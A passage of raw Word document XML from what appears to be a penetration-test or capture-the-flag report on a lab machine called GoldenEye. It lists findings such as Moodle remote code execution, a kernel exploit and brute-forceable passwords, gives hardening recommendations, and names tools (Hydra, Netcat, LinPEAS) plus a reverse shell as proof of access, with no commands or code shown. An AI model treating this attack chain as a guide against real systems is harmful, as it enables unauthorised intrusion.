      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="7CF62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2E804" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Credential Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="611BA782" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="51582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8C6A1" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>RCE via Moodle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6228C69C" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="26F93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ED807" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Kernel Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="579269FF" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="336F3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F1EDF" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Weak Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47C032F1" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="098FD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3D03B" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Brute Force Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C4837C2" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="0B89E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BF2B8" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="386B6837" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="450B7990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pict w14:anchorId="14F20330">
          <v:rect id="_x0000_i1177" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64435E5B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7. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0787A91F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pict w14:anchorId="23711398">
          <v:rect id="_x0000_i1178" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6FB87D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7.1 Credential Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B059663" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce strong password policy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10671AED" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement account lockout </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80AA19" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Use MFA for critical systems </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A5D2C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pict w14:anchorId="440968D0">
          <v:rect id="_x0000_i1179" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA51D86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7.2 Email Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A94E3" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid plaintext credential sharing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDEC85D" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypt sensitive communications </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B99A62" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Implement DLP policies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79649284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pict w14:anchorId="3806CF0D">
          <v:rect id="_x0000_i1180" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2255C7E4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7.3 Web Application Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE24C12" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitize all user inputs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378D2B00" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable HTML execution in user fields </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB77E62" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly update Moodle </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43785835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pict w14:anchorId="7841F73E">
          <v:rect id="_x0000_i1181" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADCC497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7.4 System Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026EBECF" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch kernel vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AB8AE" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable unnecessary services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABCEDE" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict POP3 access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512BFB88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pict w14:anchorId="15B6F758">
          <v:rect id="_x0000_i1182" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D64ED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7.5 Network Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF5ADBD" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement firewall rules </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58171D1A" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Use segmentation for internal services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C44870" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor abnormal login attempts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1BA9EF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pict w14:anchorId="273B9B26">
          <v:rect id="_x0000_i1183" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="225306F9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8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F4D6E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t xml:space="preserve">The compromise of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>GoldenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> system was achieved through a chain of common but critical security misconfigurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A6009" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak authentication controls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48930266" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sensitive data exposure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACFE7AF" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure web application functionality </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F7FC3E" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Outdated system components </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58949DEE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t xml:space="preserve">This allowed a complete progression from </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>unauthenticated attacker → root access</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B9145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pict w14:anchorId="34BBD2C7">
          <v:rect id="_x0000_i1184" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1780EDCB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lastRenderedPageBreak/>
        <w:t>9. Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F4389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Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583EC0D9" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A793C1D" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18042B55" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF2D06" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>LinPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F3485" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">GCC </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3E972D" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:pict w14:anchorId="2491EB32">
          <v:rect id="_x0000_i1185" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A706A" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Flags / Proof of Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF76EE5" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">User-level access: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32661F9C" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Web application access: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7640A" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C25883B" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
